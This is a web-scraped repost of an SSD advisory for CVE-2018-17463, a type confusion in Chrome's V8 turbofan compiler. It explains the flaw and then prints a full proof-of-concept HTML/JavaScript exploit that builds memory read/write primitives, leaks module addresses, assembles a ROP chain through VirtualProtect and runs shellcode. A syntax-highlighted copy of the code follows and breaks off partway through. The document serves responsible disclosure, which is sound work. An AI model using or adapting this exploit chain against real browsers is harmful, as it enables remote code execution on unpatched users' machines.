{"id":13713,"date":"2018-10-29T14:19:04","date_gmt":"2018-10-29T22:19:04","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2018\/10\/29\/news-7480\/"},"modified":"2018-10-29T14:19:04","modified_gmt":"2018-10-29T22:19:04","slug":"news-7480","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/10\/29\/news-7480\/","title":{"rendered":"SSD Advisory \u2013 Chrome Type Confusion in JSCreateObject Operation to RCE"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Mon, 29 Oct 2018 09:21:47 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory discusses a vulnerability found in turbofan, the JIT compiler. We can trigger the JavaScript code in a way that leads to type confusion that can be exploited in order to execute code remotely on Google Chrome Versions 69.0 and before.<\/p>\n<p><strong>Vendor Response<\/strong><br \/> Vendor has fixed the issue in Google Chrome version 70.<\/p>\n<p><strong>CVE<\/strong><br \/> CVE-2018-17463<\/p>\n<p><strong>Credit<\/strong><br \/> Independent security researcher, Samuel Gro\u00df, had reported this vulnerability to Beyond Security&#8217;s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Affected systems<\/strong><br \/> Google Chrome Versions 69.0 and before.<br \/> <span id=\"more-3783\"><\/span><br \/> <strong>Vulnerability Details<\/strong><br \/> In turbofan, the JIT compiler for v8, code is represented in a custom intermediate representation (IR) suitable for the various optimizations. To be able to detect and remove redundant checks, turbofan has to be able to model the side effects of all its IR operations. If this modelling is incorrect, safety checks, such as type checks, will incorrectly be removed from the emitted code, resulting in type confusions at runtime. 
See <a href=\"https:\/\/saelo.github.io\/presentations\/blackhat_us_18_attacking_client_side_jit_compilers.pdf\">https:\/\/saelo.github.io\/presentations\/blackhat_us_18_attacking_client_side_jit_compilers.pdf<\/a> for more information about this type of vulnerability. Turbofan assumes that the JSCreateObject operation, used for JavaScript code such as \u201clet newObj = Object.create(proto)\u201d, is completely side-effect free, as can be seen in the definition of the operation in js-operator.cc (the kNoWrite flag essentially means that the operation is side-effect free):<\/p>\n<div id=\"crayon-5bd78757240ff960740624\" class=\"crayon-syntax crayon-theme-secrets-of-rock crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> V(CreateObject, Operator::kNoWrite, 1, 1)<\/textarea><\/div>\n<\/div>\n
<p>This assumption is, however, not correct: when creating a new object with the given prototype object, this prototype object is modified if this is the first time that the object is used as a prototype. In particular, if the object had fast storage of properties before (all properties in a linear array), it will be converted to dictionary mode (properties stored in a hash map). However, due to the incorrect side-effect modelling, the JIT code that follows still assumes that the prototype object has fast property storage. This leads to a type confusion between a PropertyArray and a NameDictionary when accessing properties of the prototype.<\/p>\n<p><strong>Exploit<\/strong><br \/> The initial type confusion gained from the bug can be turned into a confusion between two properties of an object, as both the PropertyArray and the NameDictionary store property values inline. As such, the code following the CreateObject operation might load a property X from the object but will actually load the value of property Y. This in turn can be used to construct additional type confusion primitives because v8 traces the types of properties of an object. For example, v8 might know that some property will always contain a pointer to an object with a certain Map and will remove type checks based on that. 
When it then fetches a different property due to the bug, it might load a double value which it would then use as a pointer. The exploit constructs two type confusions to obtain arbitrary read\/write of the process\u2019 memory: The addrof function in the attached PoC exploit constructs a confusion between an unboxed double property and a JSObject pointer property, thus leaking the value of the pointer and defeating ASLR. The corrupt_arraybuffer function then constructs a confusion between an ArrayBuffer and an object with inline properties, allowing it to corrupt the pointer to the backing storage of the ArrayBuffer with an arbitrary address. This way the exploit obtains an arbitrary read\/write primitive. Finally, a Blink object with a vtable is corrupted and a virtual call performed on it, leading to RIP control, the execution of a small ROP chain, and finally shellcode execution.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bd7875724109470309230\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button 
crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">JavaScript<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;!DOCTYPE html&gt;  &lt;html&gt;      &lt;head&gt;          &lt;script&gt;          log = console.log;          print = alert;            \/\/ We need some space later          let scratch = new ArrayBuffer(0x100000);          let scratch_u8 = new Uint8Array(scratch);          let scratch_u64 = new BigUint64Array(scratch);          scratch_u8.fill(0x41, 0, 10);            let shellcode = new Uint8Array(4);          shellcode[0] = 0xcc;          shellcode[1] = 0xbe;          shellcode[2] = 0x20;          shellcode[3] = 0x18;            let ab = new ArrayBuffer(8);          let floatView = new Float64Array(ab);          let uint64View = new BigUint64Array(ab);          let uint8View = new Uint8Array(ab);            Number.prototype.toBigInt = function toBigInt() {              floatView[0] = this;              return uint64View[0];          };            BigInt.prototype.toNumber = function toNumber() {              uint64View[0] = this;              return floatView[0];          };            function hex(n) {              return &#8216;0x&#8217; + 
n.toString(16);          };            function fail(s) {              print(&#8216;FAIL &#8216; + s);              throw null;          }            const NUM_PROPERTIES = 32;          const MAX_ITERATIONS = 100000;            function gc() {              for (let i = 0; i &lt; 200; i++) {                  new ArrayBuffer(0x100000);              }          }            function make(properties) {              let o = {inline: 42}      \/\/ TODO              for (let i = 0; i &lt; NUM_PROPERTIES; i++) {                  eval(`o.p${i} = properties[${i}];`);              }              return o;          }            function pwn() {              function find_overlapping_properties() {                  let propertyNames = [];                  for (let i = 0; i &lt; NUM_PROPERTIES; i++) {                      propertyNames[i] = `p${i}`;                  }                  eval(`                      function vuln(o) {                          let a = o.inline;                          this.Object.create(o);                          ${propertyNames.map((p) =&gt; `let ${p} = o.${p};`).join(&#8216;n&#8217;)}                          return [${propertyNames.join(&#8216;, &#8216;)}];                      }                  `);                    let propertyValues = [];                  for (let i = 1; i &lt; NUM_PROPERTIES; i++) {                      propertyValues[i] = -i;                  }                    for (let i = 0; i &lt; MAX_ITERATIONS; i++) {                      let r = vuln(make(propertyValues));                      if (r[1] !== -1) {                          for (let i = 1; i &lt; r.length; i++) {                              if (i !== -r[i] &amp;&amp; r[i] &lt; 0 &amp;&amp; r[i] &gt; -NUM_PROPERTIES) {                                  return [i, -r[i]];                              }                          }                      }                  }                    fail(&#8220;Failed to find overlapping properties&#8221;);              }          
      function addrof(obj) {                  eval(`                      function vuln(o) {                          let a = o.inline;                          this.Object.create(o);                          return o.p${p1}.x1;                      }                  `);                    let propertyValues = [];                  propertyValues[p1] = {x1: 13.37, x2: 13.38};                  propertyValues[p2] = {y1: obj};                    let i = 0;                  for (; i &lt; MAX_ITERATIONS; i++) {                      let res = vuln(make(propertyValues));                      if (res !== 13.37)                          return res.toBigInt()                  }                    fail(&#8220;Addrof failed&#8221;);              }                function corrupt_arraybuffer(victim, newValue) {                  eval(`                      function vuln(o) {                          let a = o.inline;                          this.Object.create(o);                          let orig = o.p${p1}.x2;                          o.p${p1}.x2 = ${newValue.toNumber()};                          return orig;                      }                  `);                    let propertyValues = [];                  let o = {x1: 13.37, x2: 13.38};                  propertyValues[p1] = o;                  propertyValues[p2] = victim;                    for (let i = 0; i &lt; MAX_ITERATIONS; i++) {                      o.x2 = 13.38;                      let r = vuln(make(propertyValues));                      if (r !== 13.38)                          return r.toBigInt();                  }                    fail(&#8220;Corrupt ArrayBuffer failed&#8221;);              }                let [p1, p2] = find_overlapping_properties();              log(`[+] Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);                let memview_buf = new ArrayBuffer(1024);              let driver_buf = new ArrayBuffer(1024);                gc();                  let 
memview_buf_addr = addrof(memview_buf);              memview_buf_addr&#8211;;              log(`[+] ArrayBuffer @ ${hex(memview_buf_addr)}`);                let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr);                let driver = new BigUint64Array(driver_buf);              let original_memview_buf_ptr = driver[4];                let memory = {                  write(addr, bytes) {                      driver[4] = addr;                      let memview = new Uint8Array(memview_buf);                      memview.set(bytes);                  },                  read(addr, len) {                      driver[4] = addr;                      let memview = new Uint8Array(memview_buf);                      return memview.subarray(0, len);                  },                  readPtr(addr) {                      driver[4] = addr;                      let memview = new BigUint64Array(memview_buf);                      return memview[0];                  },                  writePtr(addr, ptr) {                      driver[4] = addr;                      let memview = new BigUint64Array(memview_buf);                      memview[0] = ptr;                  },                  addrof(obj) {                      memview_buf.leakMe = obj;                      let props = this.readPtr(memview_buf_addr + 8n);                      return this.readPtr(props + 15n) &#8211; 1n;                  },              };                let div = document.createElement(&#8216;div&#8217;);              let div_addr = memory.addrof(div);              \/\/alert(&#8216;div_addr = &#8216; + hex(div_addr));              let el_addr = memory.readPtr(div_addr + 0x20n);              let leak = memory.readPtr(el_addr);                let chrome_child = leak &#8211; 0x40b5f20n;              \/\/print(&#8216;chrome_child @ &#8216; + hex(chrome_child));              \/\/ CreateEventW              let kernel32 = memory.readPtr(chrome_child + 0x4771260n) &#8211; 0x20750n;   
           \/\/print(&#8216;kernel32 @ &#8216; + hex(kernel32));              \/\/ NtQueryEvent              let ntdll = memory.readPtr(kernel32 + 0x79208n) &#8211; 0x9a9a0n;              \/\/print(&#8216;ntdll @ &#8216; + hex(ntdll));                \/*              00007ff9`296f0705 488b5150        mov     rdx,qword ptr [rcx+50h]              00007ff9`296f0709 488b6918        mov     rbp,qword ptr [rcx+18h]              00007ff9`296f070d 488b6110        mov     rsp,qword ptr [rcx+10h]              00007ff9`296f0711 ffe2            jmp     rdx              *\/                let gadget = ntdll + 0xA0705n;              \/\/let gadget = 0x41414141n;                let pop_gadgets = [                  chrome_child + 0x36a657n, \/\/ pop rcx ; ret     59 c3                  chrome_child + 0x9962n, \/\/ pop rdx ; ret       5a c3                  chrome_child + 0xc72852n, \/\/ pop r8 ; ret      41 58 c3                  chrome_child + 0xc51425n, \/\/ pop r9 ; ret      41 59 c3              ];                let scratch_addr = memory.readPtr(memory.addrof(scratch) + 0x20n);                let sc_offset = 0x20000n &#8211; scratch_addr % 0x1000n;              let sc_addr = scratch_addr + sc_offset              scratch_u8.set(shellcode, Number(sc_offset));                scratch_u64.fill(gadget, 0, 100);              \/\/scratch_u64.fill(0xdeadbeefn, 0, 100);                let fake_vtab = scratch_addr;              let fake_stack = scratch_addr + 0x10000n;                let stack = [                  pop_gadgets[0],                  sc_addr,                  pop_gadgets[1],                  0x1000n,                  pop_gadgets[2],                  0x40n,                  pop_gadgets[3],                  scratch_addr,                  kernel32 + 0x193d0n, \/\/ VirtualProtect                  sc_addr,              ];              for (let i = 0; i &lt; stack.length; ++i) {                  scratch_u64[0x10000\/8 + i] = stack[i];              }                
memory.writePtr(el_addr + 0x10n, fake_stack); \/\/ RSP              memory.writePtr(el_addr + 0x50n, pop_gadgets[0] + 1n); \/\/ RIP = ret              memory.writePtr(el_addr + 0x58n, 0n);              memory.writePtr(el_addr + 0x60n, 0n);              memory.writePtr(el_addr + 0x68n, 0n);              memory.writePtr(el_addr, fake_vtab);                \/\/ Trigger virtual call              div.dispatchEvent(new Event(&#8216;click&#8217;));                \/\/ We are done here, repair the corrupted array buffers              let addr = memory.addrof(driver_buf);              memory.writePtr(addr + 32n, original_driver_buf_ptr);              memory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr);          }            alert(&#8220;Press OK to pwn&#8221;);          pwn();          &lt;\/script&gt;      &lt;\/head&gt;      &lt;body&gt;      &lt;\/body&gt;  &lt;\/html&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-9\">9<\/div>\n<div 
class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-5bd7875724109470309230-198\">198<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-199\">199<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-200\">200<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-201\">201<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-202\">202<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-203\">203<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-204\">204<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-205\">205<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-206\">206<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-207\">207<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-208\">208<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-209\">209<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-210\">210<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-211\">211<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-212\">212<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-213\">213<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-214\">214<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-215\">215<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-216\">216<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-217\">217<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-218\">218<\/div>\n<div class=\"crayon-num\" 
data-line=\"crayon-5bd7875724109470309230-219\">219<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-220\">220<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-221\">221<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-222\">222<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-223\">223<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-224\">224<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-225\">225<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-226\">226<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-227\">227<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-228\">228<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-229\">229<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-230\">230<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-231\">231<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-232\">232<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-233\">233<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-234\">234<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-235\">235<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-236\">236<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-237\">237<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-238\">238<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-239\">239<\/div>\n<div class=\"crayon-num 
crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-240\">240<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-241\">241<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-242\">242<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-243\">243<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-244\">244<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-245\">245<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-246\">246<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-247\">247<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-248\">248<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-249\">249<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-250\">250<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-251\">251<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-252\">252<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-253\">253<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-254\">254<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-255\">255<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-256\">256<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-257\">257<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-258\">258<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-259\">259<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-260\">260<\/div>\n<div 
class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-261\">261<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-262\">262<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-263\">263<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-264\">264<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-265\">265<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-266\">266<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-267\">267<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-268\">268<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-269\">269<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-270\">270<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-271\">271<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-272\">272<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-1\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-e\">DOCTYPE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">html<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-2\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">html<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">head<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-ta\">&lt;script&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">log<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">console<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">log<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">alert<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ We need some space later<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">scratch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ArrayBuffer<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-cn\">0x100000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">scratch_u8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint8Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">scratch<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">scratch_u64<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">BigUint64Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">scratch<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">scratch_u8<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fill<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x41<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div 
class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">shellcode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint8Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">shellcode<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xcc<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">shellcode<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xbe<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">shellcode<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> 
